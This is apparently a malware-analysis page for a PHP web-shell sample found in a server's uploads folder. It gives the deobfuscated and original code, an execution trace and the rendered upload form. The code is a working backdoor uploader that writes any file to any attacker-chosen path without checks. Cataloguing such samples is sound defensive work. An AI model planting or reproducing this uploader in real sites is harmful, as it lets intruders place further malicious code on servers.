Screenshot
Attributes
Files
move_uploaded_file (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)

Title
Upload files... (Deobfuscated, HTML, Original)

Deobfuscated PHP code
<?php

$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='{$fullpath}'>BADEXAMPLE</a></h1>";
    }
}
echo "<html><head><title>Upload files...</title></head><body><form method=POST enctype=\"multipart/form-data\" action=\"\"><input type=text name=path><input type=\"file\" name=\"files\"><input type=submit value=\"Up\"></form></body></html>";
Execution traces
data/traces/18a295e5270dbc65dee56aa4f61d0aa9_trace-1676240530.2729.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:22:36.170681]
1	0	1	0.000146	393464
1	3	0	0.000202	395664	{main}	1		/var/www/html/uploads/u.php	0	0
1		A						/var/www/html/uploads/u.php	2	$files = NULL
1	3	1	0.000241	395664
			0.000266	314232
TRACE END   [2023-02-12 20:22:36.170828]

Generated HTML code
<html><head><title>Upload files...</title></head><body><form method="POST" enctype="multipart/form-data" action=""><input type="text" name="path"><input type="file" name="files"><input type="submit" value="Up"></form></body></html>
Original PHP code
<?php
$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='$fullpath'>BADEXAMPLE</a></h1>";
    }
}echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>';
?>